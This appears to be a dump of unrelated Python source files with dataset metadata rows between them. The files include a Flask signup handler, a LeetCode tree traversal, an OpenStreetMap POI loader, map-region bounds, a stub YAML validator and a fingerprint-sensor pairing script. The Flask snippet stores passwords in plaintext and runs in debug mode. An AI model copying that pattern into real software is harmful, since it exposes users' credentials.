user_name_is_exits = User.query.filter(User.user_name == user_name).first()
if user_name_is_exits:
index_meg = "用户名已存在"
else:
user_obj = User(user_name=user_name, user_password=user_pwd)
db.session.add(user_obj)
db.session.commit()
index_meg = "注册成功"
print("注册成功")
# user_name = request.args.get("user_name", "")
# user_pwd = request.args.get("user_pwd", "")
# user_is_login = User.query.filter_by(user_name=user_name, user_password=user_pwd).first()
# if user_is_login:
# index_meg = "登陆成功"
# print("登陆成功")
# return render_template("login_ok.html", index_meg=index_meg)
# else:
# # index_meg = "登陆失败"
# print("登陆失败")
return render_template("index.html", index_meg=index_meg)
if __name__ == "__main__":
db.drop_all()
db.create_all()
app.run(debug=True)
| 32.368421 | 95 | 0.614634 | 245 | 1,845 | 4.318367 | 0.338776 | 0.113422 | 0.090737 | 0.042533 | 0.173913 | 0.113422 | 0.066163 | 0.066163 | 0 | 0 | 0 | 0.010036 | 0.243902 | 1,845 | 56 | 96 | 32.946429 | 0.748387 | 0.190244 | 0 | 0.055556 | 0 | 0 | 0.12289 | 0.067522 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0.055556 | 0.055556 | 0.027778 | 0.277778 | 0.055556 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
2293c25414f578bb3829ecd6692177ce5d098784 | 1,218 | py | Python | python/tree/0103_binary_tree_zigzag_level_order_traversal.py | linshaoyong/leetcode | ea052fad68a2fe0cbfa5469398508ec2b776654f | [
"MIT"
] | 6 | 2019-07-15T13:23:57.000Z | 2020-01-22T03:12:01.000Z | python/tree/0103_binary_tree_zigzag_level_order_traversal.py | linshaoyong/leetcode | ea052fad68a2fe0cbfa5469398508ec2b776654f | [
"MIT"
] | null | null | null | python/tree/0103_binary_tree_zigzag_level_order_traversal.py | linshaoyong/leetcode | ea052fad68a2fe0cbfa5469398508ec2b776654f | [
"MIT"
] | 1 | 2019-07-24T02:15:31.000Z | 2019-07-24T02:15:31.000Z | class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution(object):
def zigzagLevelOrder(self, root):
"""
:type root: TreeNode
:rtype: List[List[int]]
"""
if not root:
return []
a = [root]
b = []
c = []
r = [[root.val]]
i = 1
while True:
for n in a:
if n.left:
b.append(n.left)
c.append(n.left.val)
if n.right:
b.append(n.right)
c.append(n.right.val)
if not b:
break
else:
a = b
if i & 1 == 1:
c.reverse()
r.append(c)
b = []
c = []
i += 1
return r
def test_zigzag_level_order():
a = TreeNode(3)
b = TreeNode(9)
c = TreeNode(20)
d = TreeNode(15)
e = TreeNode(7)
a.left = b
a.right = c
c.left = d
c.right = e
assert Solution().zigzagLevelOrder(a) == [
[3],
[20, 9],
[15, 7]
]
| 21 | 46 | 0.374384 | 136 | 1,218 | 3.301471 | 0.352941 | 0.062361 | 0.035635 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.03005 | 0.50821 | 1,218 | 57 | 47 | 21.368421 | 0.719533 | 0.036125 | 0 | 0.083333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020833 | 1 | 0.0625 | false | 0 | 0 | 0 | 0.145833 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
229f21bdd7be594d33b1093f3cb181d2690aa326 | 3,714 | py | Python | pyroute/poi_osm.py | ftrimble/route-grower | d4343ecc9b13a3e1701c8460c8a1792d08b74567 | [
"Apache-2.0"
] | null | null | null | pyroute/poi_osm.py | ftrimble/route-grower | d4343ecc9b13a3e1701c8460c8a1792d08b74567 | [
"Apache-2.0"
] | null | null | null | pyroute/poi_osm.py | ftrimble/route-grower | d4343ecc9b13a3e1701c8460c8a1792d08b74567 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
#----------------------------------------------------------------
# OSM POI handler for pyroute
#
#------------------------------------------------------
# Copyright 2007, Oliver White
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#------------------------------------------------------
from xml.sax import make_parser, handler
from poi_base import *
import os
from xml.sax._exceptions import SAXParseException
import urllib
class osmPoiModule(poiModule, handler.ContentHandler):
def __init__(self, modules):
poiModule.__init__(self, modules)
self.draw = False
self.loadPOIs("all", "amenity|shop=*")
def loadPOIs(self, name, search):
filename = os.path.join(os.path.dirname(__file__),
"data", "poi_%s.osm" % name)
url = "http://www.informationfreeway.org/api/0.5/node[%s][%s]" %(search,
self.bbox())
if(not os.path.exists(filename)):
print "Downloading POIs from OSM"
urllib.urlretrieve(url, filename)
self.load(filename, os.path.join(os.path.dirname(__file__),
"Setup", "poi.txt"))
def bbox(self):
# TODO: based on location!
return "bbox=-6,48,2.5,61"
def load(self, filename, listfile):
self.filters = []
print "Loading POIs from %s" % listfile
f = open(listfile,"r")
try:
for line in f:
if(len(line) > 1):
text = line.rstrip()
name, filter = text.split('|')
group = poiGroup(name)
self.groups.append(group)
self.filters.append({'name':name,'filter':filter,'group':group})
finally:
f.close()
if(not os.path.exists(filename)):
print "Can't load %s"%filename
return
elif not os.path.getsize(filename):
print "%s is empty"%filename
self.inNode = False
parser = make_parser()
parser.setContentHandler(self)
try:
parser.parse(filename)
except SAXParseException:
print "Error while parsing file"
#TODO: what should now happens?
def startElement(self, name, attrs):
if name == "node":
self.currentNode = { \
'lat': float(attrs.get('lat')),
'lon': float(attrs.get('lon'))}
self.inNode = True
if name == "tag" and self.inNode:
self.currentNode[attrs.get('k')] = attrs.get('v')
def endElement(self, name):
if(name == "node"):
self.storeNode(self.currentNode)
self.inNode = False
def passesFilter(self,n,f):
parts = f.split(';')
matched = True
for part in parts:
k,v = part.split('=',1)
if(n.get(k,'') != v):
matched = False
return(matched)
def storeNode(self, n):
for f in self.filters:
if(self.passesFilter(n,f['filter'])):
x = poi(n['lat'], n['lon'])
x.title = n.get('amenity','') + ': ' + n.get('name', '?')
#print "%s matches %s" % (x.title, f['name'])
f['group'].items.append(x)
def save(self):
# Default filename if none was loaded
if(self.filename == None):
self.filename = os.path.join(os.path.dirname(__file__),
"data", "poi.osm")
self.saveAs(self.filename)
def saveAs(self,filename):
if(filename == None):
return
pass
if __name__ == "__main__":
nodes = osmPoiModule(None)
nodes.sort({'valid':True,'lat':51.3,'lon':-0.2})
#nodes.report()
| 29.244094 | 74 | 0.630856 | 510 | 3,714 | 4.529412 | 0.398039 | 0.023377 | 0.016883 | 0.024675 | 0.112987 | 0.101732 | 0.077489 | 0.051515 | 0.036364 | 0.036364 | 0 | 0.006881 | 0.178244 | 3,714 | 126 | 75 | 29.47619 | 0.75 | 0.270328 | 0 | 0.093023 | 0 | 0 | 0.116201 | 0 | 0 | 0 | 0 | 0.007937 | 0 | 0 | null | null | 0.034884 | 0.05814 | null | null | 0.05814 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
22a26cac9546e3d04238eea2e14e595751d5270c | 11,429 | py | Python | geo_regions.py | saeed-moghimi-noaa/Maxelev_plot | 5bb701d8cb7d64db4c89ea9d7993a8269e57e504 | [
"CC0-1.0"
] | null | null | null | geo_regions.py | saeed-moghimi-noaa/Maxelev_plot | 5bb701d8cb7d64db4c89ea9d7993a8269e57e504 | [
"CC0-1.0"
] | null | null | null | geo_regions.py | saeed-moghimi-noaa/Maxelev_plot | 5bb701d8cb7d64db4c89ea9d7993a8269e57e504 | [
"CC0-1.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Geo regions for map plot
"""
__author__ = "Saeed Moghimi"
__copyright__ = "Copyright 2017, UCAR/NOAA"
__license__ = "GPL"
__version__ = "1.0"
__email__ = "moghimis@gmail.com"
import matplotlib.pyplot as plt
from collections import defaultdict
defs = defaultdict(dict)
defs['elev']['var'] = 'elev'
defs['elev']['vmin'] = -1
defs['elev']['vmax'] = 1
defs['elev']['label'] = 'Elev. [m]'
defs['elev']['format']= '%3.1g'
defs['elev']['cmap'] = plt.cm.jet_r
def get_region_extent(region = 'hsofs_region'):
if region == 'hsofs_region':
defs['lim']['xmin'] = -99.0
defs['lim']['xmax'] = -52.8
defs['lim']['ymin'] = 5.0
defs['lim']['ymax'] = 46.3
##IKE
elif region == 'caribbean':
defs['lim']['xmin'] = -78.
defs['lim']['xmax'] = -74.
defs['lim']['ymin'] = 20.
defs['lim']['ymax'] = 24.
defs['lim']['xmin'] = -82.
defs['lim']['xmax'] = -71.
defs['lim']['ymin'] = 18.
defs['lim']['ymax'] = 26.
elif region == 'ike_region':
defs['lim']['xmin'] = -98.5
defs['lim']['xmax'] = -84.5
defs['lim']['ymin'] = 24.
defs['lim']['ymax'] = 31.5
elif region == 'caribbean_bigger':
defs['lim']['xmin'] = -78.0
defs['lim']['xmax'] = -58
defs['lim']['ymin'] = 10.0
defs['lim']['ymax'] = 28.
elif region == 'ike_local':
defs['lim']['xmin'] = -96
defs['lim']['xmax'] = -92
defs['lim']['ymin'] = 28.5
defs['lim']['ymax'] = 30.6
elif region == 'ike_wave':
defs['lim']['xmin'] = -95.63
defs['lim']['xmax'] = -88.0
defs['lim']['ymin'] = 28.37
defs['lim']['ymax'] = 30.50
elif region == 'ike_hwm':
defs['lim']['xmin'] = -96.15
defs['lim']['xmax'] = -88.5
defs['lim']['ymin'] = 28.45
defs['lim']['ymax'] = 30.7
elif region == 'ike_galv_bay':
defs['lim']['xmin'] = -95.92
defs['lim']['xmax'] = -94.81
defs['lim']['ymin'] = 29.37
defs['lim']['ymax'] = 29.96
elif region == 'ike_galv_nwm':
defs['lim']['xmin'] = -95.4
defs['lim']['xmax'] = -94.2
defs['lim']['ymin'] = 28.66
defs['lim']['ymax'] = 30.4
elif region == 'ike_wav_break':
defs['lim']['xmin'] = -95
defs['lim']['xmax'] = -94.5
defs['lim']['ymin'] = 28.7 + 0.6
defs['lim']['ymax'] = 30.4 - 0.6
elif region == 'ike_f63_timeseries':
defs['lim']['xmin'] = -94.2579 - 0.1
defs['lim']['xmax'] = -94.2579 + 0.1
defs['lim']['ymin'] = 29.88642 - 0.1
defs['lim']['ymax'] = 29.88642 + 0.1
elif region == 'ike_f63_timeseries_det':
defs['lim']['xmin'] = -94.2300
defs['lim']['xmax'] = -94.1866
defs['lim']['ymin'] = 29.82030
defs['lim']['ymax'] = 29.84397+0.05
elif region == 'ike_cpl_paper':
defs['lim']['xmin'] = -95.127481
defs['lim']['xmax'] = -93.233053
defs['lim']['ymin'] = 29.198490
defs['lim']['ymax'] = 30.132224
##IRMA
elif region == 'carib_irma':
defs['lim']['xmin'] = -84.0
defs['lim']['xmax'] = -60.
defs['lim']['ymin'] = 15.0
defs['lim']['ymax'] = 29.
elif region == 'burbuda':
defs['lim']['xmin'] = -65.0
defs['lim']['xmax'] = -60.
defs['lim']['ymin'] = 15.0
defs['lim']['ymax'] = 19.
elif region == 'burbuda_zoom':
defs['lim']['xmin'] = -63.8
defs['lim']['xmax'] = -60.8
defs['lim']['ymin'] = 16.8
defs['lim']['ymax'] = 18.65
elif region == 'puertorico':
defs['lim']['xmin'] = -67.35
defs['lim']['xmax'] = -66.531
defs['lim']['ymin'] = 18.321
defs['lim']['ymax'] = 18.674
elif region == 'puertorico_shore':
defs['lim']['xmin'] = -67.284
defs['lim']['xmax'] = -66.350
defs['lim']['ymin'] = 18.360
defs['lim']['ymax'] = 18.890
elif region == 'key_west':
defs['lim']['xmin'] = -82.7
defs['lim']['xmax'] = -74.5
defs['lim']['ymin'] = 21.3
defs['lim']['ymax'] = 27.2
elif region == 'key_west_zoom':
defs['lim']['xmin'] = -82.2
defs['lim']['xmax'] = -79.4
defs['lim']['ymin'] = 24.1
defs['lim']['ymax'] = 26.1
elif region == 'cuba_zoom':
defs['lim']['xmin'] = -82.
defs['lim']['xmax'] = -77.
defs['lim']['ymin'] = 21.5
defs['lim']['ymax'] = 23.5
elif region == 'key_west_timeseries':
defs['lim']['xmin'] = -84.62
defs['lim']['xmax'] = -79.2
defs['lim']['ymin'] = 23.6
defs['lim']['ymax'] = 30.0
elif region == 'pr_timeseries':
defs['lim']['xmin'] = -68
defs['lim']['xmax'] = -64
defs['lim']['ymin'] = 17.3
defs['lim']['ymax'] = 19.2
elif region == 'key_west_anim':
defs['lim']['xmin'] = -85.5
defs['lim']['xmax'] = -74.5
defs['lim']['ymin'] = 21.0
defs['lim']['ymax'] = 31.5
## ISABEL
elif region == 'isa_region':
defs['lim']['xmin'] = -80.2
defs['lim']['xmax'] = -71.6
defs['lim']['ymin'] = 31.9
defs['lim']['ymax'] = 41.9
elif region == 'isa_local':
defs['lim']['xmin'] = -77.5
defs['lim']['xmax'] = -74
defs['lim']['ymin'] = 34.5
defs['lim']['ymax'] = 40.0
defs['lim']['xmin'] = -78.5
defs['lim']['xmax'] = -74
defs['lim']['ymin'] = 33.5
defs['lim']['ymax'] = 39.5
elif region == 'isa_hwm':
defs['lim']['xmin'] = -76.01
defs['lim']['xmax'] = -75.93
defs['lim']['ymin'] = 36.74
defs['lim']['ymax'] = 36.93
elif region == 'isa_landfall':
defs['lim']['xmin'] = -77.8
defs['lim']['xmax'] = -75.2
defs['lim']['ymin'] = 34.2
defs['lim']['ymax'] = 37.5
elif region == 'isa_landfall_zoom':
defs['lim']['xmin'] = -77.8
defs['lim']['xmax'] = -75.2
defs['lim']['ymin'] = 34.2
defs['lim']['ymax'] = 36.0
## SANDY
elif region == 'san_track':
defs['lim']['xmin'] = -82.0
defs['lim']['xmax'] = -67.0
defs['lim']['ymin'] = 23.0
defs['lim']['ymax'] = 43.6
elif region == 'san_area':
defs['lim']['xmin'] = -77.0
defs['lim']['xmax'] = -70.0
defs['lim']['ymin'] = 37.0
defs['lim']['ymax'] = 42.0
elif region == 'san_track':
defs['lim']['xmin'] = -82.0
defs['lim']['xmax'] = -67.0
defs['lim']['ymin'] = 23.0
defs['lim']['ymax'] = 43.6
elif region == 'san_area':
defs['lim']['xmin'] = -77.0
defs['lim']['xmax'] = -70.0
defs['lim']['ymin'] = 37.0
defs['lim']['ymax'] = 42.0
elif region == 'san_area2':
defs['lim']['xmin'] = -75.9
defs['lim']['xmax'] = -73.3
defs['lim']['ymin'] = 38.5
defs['lim']['ymax'] = 41.3
elif region == 'san_newyork':
defs['lim']['xmin'] = -74.5
defs['lim']['xmax'] = -73.55
defs['lim']['ymin'] = 40.35
defs['lim']['ymax'] = 41.2
elif region == 'san_delaware':
defs['lim']['xmin'] = -75.87
defs['lim']['xmax'] = -74.31
defs['lim']['ymin'] = 38.26
defs['lim']['ymax'] = 40.51
elif region == 'san_jamaica_bay':
defs['lim']['xmin'] = -73.963520
defs['lim']['xmax'] = -73.731455
defs['lim']['ymin'] = 40.518074
defs['lim']['ymax'] = 40.699618
elif region == 'irn_region':
defs['lim']['xmin'] = -78.41
defs['lim']['xmax'] = -73.48
defs['lim']['ymin'] = 33.55
defs['lim']['ymax'] = 41.31
elif region == 'irn_hwm':
defs['lim']['xmin'] = -78.64
defs['lim']['xmax'] = -69.54
defs['lim']['ymin'] = 33.80
defs['lim']['ymax'] = 41.82
## ANDREW
elif region == 'and_region':
defs['lim']['xmin'] = -98.5
defs['lim']['xmax'] = -77.5
defs['lim']['ymin'] = 23.
defs['lim']['ymax'] = 32.
elif region == 'and_fl_lu':
defs['lim']['xmin'] = -98.5
defs['lim']['xmax'] = -76.5
defs['lim']['ymin'] = 21.
defs['lim']['ymax'] = 32.
elif region == 'and_local_lu':
defs['lim']['xmin'] = -95
defs['lim']['xmax'] = -86
defs['lim']['ymin'] = 28.
defs['lim']['ymax'] = 32
elif region == 'and_local_fl':
defs['lim']['xmin'] = -86
defs['lim']['xmax'] = -79.5
defs['lim']['ymin'] = 24.
defs['lim']['ymax'] = 34
elif region == 'and_local_lu_landfall':
defs['lim']['xmin'] = -92.4
defs['lim']['xmax'] = -87.5
defs['lim']['ymin'] = 28.
defs['lim']['ymax'] = 31.
elif region == 'and_local_fl_landfall':
defs['lim']['xmin'] = -80.0
defs['lim']['xmax'] = -80.5
defs['lim']['ymin'] = 25.34
defs['lim']['ymax'] = 25.8
## operational upgrade
# NYC area: -74.027725,40.596099
elif region == 'NYC_area':
defs['lim']['xmin'] = -74.027725 - 0.25
defs['lim']['xmax'] = -74.027725 + 0.25
defs['lim']['ymin'] = 40.596099 - 0.2
defs['lim']['ymax'] = 40.596099 + 0.2
# Tampa area: -82.455511,27.921438
elif region == 'Tampa_area':
defs['lim']['xmin'] = -82.455511 - 0.25
defs['lim']['xmax'] = -82.455511 + 0.25
defs['lim']['ymin'] = 27.921438 - 0.2
defs['lim']['ymax'] = 27.921438 + 0.2
# Marshall Islands: 169.107299,7.906637
elif region == 'Marshall':
defs['lim']['xmin'] = 169.107299 - 0.25
defs['lim']['xmax'] = 169.107299 + 0.25
defs['lim']['ymin'] = 7.906637 - 0.2
defs['lim']['ymax'] = 7.906637 + 0.2
# Palau: 134.461436,7.436438
elif region == 'Palau':
defs['lim']['xmin'] = 134.461436 - 0.25
defs['lim']['xmax'] = 134.461436 + 0.25
defs['lim']['ymin'] = 7.436438 - 0.2
defs['lim']['ymax'] = 7.436438 + 0.2
elif region == 'NYC_Area_m':
defs['lim']['xmin'] = -73.55
defs['lim']['xmax'] = -74.26
defs['lim']['ymin'] = 40.55
defs['lim']['ymax'] = 40.91
elif region == 'Tampa_Area_m':
defs['lim']['xmin'] = -82.37
defs['lim']['xmax'] = -82.75
defs['lim']['ymin'] = 27.63
defs['lim']['ymax'] = 28.05
elif region == 'Marshall_Islands_m':
defs['lim']['xmin'] = 164.92
defs['lim']['xmax'] = 173.45
defs['lim']['ymin'] = 5.10
defs['lim']['ymax'] = 11.90
elif region == 'Palau_m':
defs['lim']['xmin'] = 134.01
defs['lim']['xmax'] = 134.78
defs['lim']['ymin'] = 6.78
defs['lim']['ymax'] = 8.52
elif region == 'Port_Arthur_m':
defs['lim']['xmin'] = -93.60
defs['lim']['xmax'] = -94.24
defs['lim']['ymin'] = 29.62
defs['lim']['ymax'] = 30.14
return defs['lim']
| 34.116418 | 52 | 0.441683 | 1,473 | 11,429 | 3.361847 | 0.157502 | 0.318053 | 0.124394 | 0.024233 | 0.30937 | 0.240913 | 0.197294 | 0.160339 | 0.122577 | 0.099152 | 0 | 0.125334 | 0.313063 | 11,429 | 334 | 53 | 34.218563 | 0.505413 | 0.021262 | 0 | 0.166667 | 0 | 0 | 0.209031 | 0.005734 | 0 | 0 | 0 | 0 | 0 | 1 | 0.003401 | false | 0 | 0.006803 | 0 | 0.013605 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
22a96894a0336c7d7df8e78f4c4c6ea30cbd0530 | 1,507 | py | Python | microservices/validate/tools/validates.py | clodonil/pipeline_aws_custom | 8ca517d0bad48fe528461260093f0035f606f9be | [
"Apache-2.0"
] | null | null | null | microservices/validate/tools/validates.py | clodonil/pipeline_aws_custom | 8ca517d0bad48fe528461260093f0035f606f9be | [
"Apache-2.0"
] | null | null | null | microservices/validate/tools/validates.py | clodonil/pipeline_aws_custom | 8ca517d0bad48fe528461260093f0035f606f9be | [
"Apache-2.0"
] | null | null | null | """
Tools para validar o arquivo template recebido do SQS
"""
class Validate:
def __init__(self):
pass
def check_validate_yml(self, template):
"""
valida se o arquivo yml é valido
"""
if template:
return True
else:
return False
def check_yml_struct(self, template):
"""
Valida se a estrutura do yml é valido
"""
if template:
return True
else:
return False
def check_template_exist(self, template):
"""
Valida se o template informado no arquivo yml existe
"""
if template:
return True
else:
return False
def check_callback_protocol_endpoint(self, template):
"""
validar se o protocolo e endpoint são validos
"""
return True
def check_template(self, template):
if self.check_validate_yml(template) \
and self.check_yml_struct(template) \
and self.check_template_exist(template) \
and self.check_callback_protocol_endpoint(template):
msg = {"status": True}
return msg
else:
msg = {'status': False, 'message': 'problema no arquivo yml'}
return msg
def change_yml_to_json(content):
try:
template_json = yaml.safe_load(content)
return template_json
except yaml.YAMLError as error:
return {"message": str(error)}
| 25.542373 | 73 | 0.568016 | 166 | 1,507 | 4.981928 | 0.349398 | 0.048368 | 0.065296 | 0.072551 | 0.230955 | 0.180169 | 0.180169 | 0.180169 | 0.180169 | 0.128174 | 0 | 0 | 0.357664 | 1,507 | 58 | 74 | 25.982759 | 0.854339 | 0.147976 | 0 | 0.444444 | 0 | 0 | 0.041385 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.194444 | false | 0.027778 | 0 | 0 | 0.527778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
22ac34a9639b610355752302f9ba8f423e657538 | 436 | py | Python | Specialization/Personal/SortHours.py | lastralab/Statistics | 358679f2e749db2e23c655795b34382c84270704 | [
"MIT"
] | 3 | 2017-09-26T20:19:57.000Z | 2020-02-03T16:59:59.000Z | Specialization/Personal/SortHours.py | lastralab/Statistics | 358679f2e749db2e23c655795b34382c84270704 | [
"MIT"
] | 1 | 2017-09-22T13:57:04.000Z | 2017-09-26T20:03:24.000Z | Specialization/Personal/SortHours.py | lastralab/Statistics | 358679f2e749db2e23c655795b34382c84270704 | [
"MIT"
] | 3 | 2018-05-09T01:41:16.000Z | 2019-01-16T15:32:59.000Z | name = "mail.txt"
counts = dict()
handle = open(name)
for line in handle:
line = line.rstrip()
if line == '':
continue
words = line.split()
if words[0] == 'From':
counts[words[5][:2]] = counts.get(words[5][:2], 0) + 1
tlist = list()
for key, value in counts.items():
newtup = (key, value)
tlist.append(newtup)
tlist.sort()
for key, value in tlist:
print key, value
| 18.956522 | 64 | 0.548165 | 60 | 436 | 3.983333 | 0.5 | 0.133891 | 0.058577 | 0.108787 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022654 | 0.291284 | 436 | 22 | 65 | 19.818182 | 0.750809 | 0 | 0 | 0 | 0 | 0 | 0.027523 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.058824 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
22ae53d11248d624a0ee5f564b8dd2e374ddaa54 | 606 | py | Python | Day 2/Day_2_Python.py | giTan7/30-Days-Of-Code | f023a2bf1b5e58e1eb5180162443b9cd4b6b2ff8 | [
"MIT"
] | 1 | 2020-10-15T14:44:08.000Z | 2020-10-15T14:44:08.000Z | Day 2/Day_2_Python.py | giTan7/30-Days-Of-Code | f023a2bf1b5e58e1eb5180162443b9cd4b6b2ff8 | [
"MIT"
] | null | null | null | Day 2/Day_2_Python.py | giTan7/30-Days-Of-Code | f023a2bf1b5e58e1eb5180162443b9cd4b6b2ff8 | [
"MIT"
] | null | null | null | #!/bin/python3
import math
import os
import random
import re
import sys
# Complete the solve function below.
def solve(meal_cost, tip_percent, tax_percent):
tip = (meal_cost * tip_percent)/100
tax = (meal_cost * tax_percent)/100
print(int(meal_cost + tip + tax + 0.5))
# We add 0.5 because the float should be rounded to the nearest integer
if __name__ == '__main__':
meal_cost = float(input())
tip_percent = int(input())
tax_percent = int(input())
solve(meal_cost, tip_percent, tax_percent)
# Time complexity: O(1)
# Space complexity: O(1)
| 22.444444 | 76 | 0.663366 | 89 | 606 | 4.269663 | 0.483146 | 0.126316 | 0.115789 | 0.142105 | 0.173684 | 0.173684 | 0.173684 | 0 | 0 | 0 | 0 | 0.027957 | 0.232673 | 606 | 26 | 77 | 23.307692 | 0.789247 | 0.268977 | 0 | 0 | 0 | 0 | 0.019417 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.357143 | 0 | 0.428571 | 0.071429 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
22aec8fbe47f7975a1e7f4a0caa5c88c56e4a03e | 1,133 | py | Python | data/train/python/22aec8fbe47f7975a1e7f4a0caa5c88c56e4a03e__init__.py | harshp8l/deep-learning-lang-detection | 2a54293181c1c2b1a2b840ddee4d4d80177efb33 | [
"MIT"
] | 84 | 2017-10-25T15:49:21.000Z | 2021-11-28T21:25:54.000Z | data/train/python/22aec8fbe47f7975a1e7f4a0caa5c88c56e4a03e__init__.py | vassalos/deep-learning-lang-detection | cbb00b3e81bed3a64553f9c6aa6138b2511e544e | [
"MIT"
] | 5 | 2018-03-29T11:50:46.000Z | 2021-04-26T13:33:18.000Z | data/train/python/22aec8fbe47f7975a1e7f4a0caa5c88c56e4a03e__init__.py | vassalos/deep-learning-lang-detection | cbb00b3e81bed3a64553f9c6aa6138b2511e544e | [
"MIT"
] | 24 | 2017-11-22T08:31:00.000Z | 2022-03-27T01:22:31.000Z | def save_form(form, actor=None):
"""Allows storing a form with a passed actor. Normally, Form.save() does not accept an actor, but if you require
this to be passed (is not handled by middleware), you can use this to replace form.save().
Requires you to use the audit.Model model as the actor is passed to the object's save method.
"""
obj = form.save(commit=False)
obj.save(actor=actor)
form.save_m2m()
return obj
#def intermediate_save(instance, actor=None):
# """Allows saving of an instance, without storing the changes, but keeping the history. This allows you to perform
# intermediate saves:
#
# obj.value1 = 1
# intermediate_save(obj)
# obj.value2 = 2
# obj.save()
# <value 1 and value 2 are both stored in the database>
# """
# if hasattr(instance, '_audit_changes'):
# tmp = instance._audit_changes
# if actor:
# instance.save(actor=actor)
# else:
# instance.save()
# instance._audit_changes = tmp
# else:
# if actor:
# instance.save(actor=actor)
# else:
# instance.save()
| 32.371429 | 118 | 0.634598 | 156 | 1,133 | 4.544872 | 0.423077 | 0.045134 | 0.059238 | 0.06488 | 0.126939 | 0.126939 | 0.126939 | 0.126939 | 0.126939 | 0 | 0 | 0.008383 | 0.263019 | 1,133 | 34 | 119 | 33.323529 | 0.840719 | 0.826125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
22b2735d6e9bb2b53a0a0541af9ec0a4bc2db7e4 | 738 | py | Python | pair.py | hhgarnes/python-validity | 82b42e4fd152f10f75584de56502fd9ada299bb5 | [
"MIT"
] | null | null | null | pair.py | hhgarnes/python-validity | 82b42e4fd152f10f75584de56502fd9ada299bb5 | [
"MIT"
] | null | null | null | pair.py | hhgarnes/python-validity | 82b42e4fd152f10f75584de56502fd9ada299bb5 | [
"MIT"
] | null | null | null |
from time import sleep
from proto9x.usb import usb
from proto9x.tls import tls
from proto9x.flash import read_flash
from proto9x.init_flash import init_flash
from proto9x.upload_fwext import upload_fwext
from proto9x.calibrate import calibrate
from proto9x.init_db import init_db
#usb.trace_enabled=True
#tls.trace_enabled=True
def restart():
print('Sleeping...')
sleep(3)
tls.reset()
usb.open()
usb.send_init()
tls.parseTlsFlash(read_flash(1, 0, 0x1000))
tls.open()
usb.open()
print('Initializing flash...')
init_flash()
restart()
print('Uploading firmware...')
upload_fwext()
restart()
print('Calibrating...')
calibrate()
print('Init database...')
init_db()
print('That\'s it, pairing\'s finished')
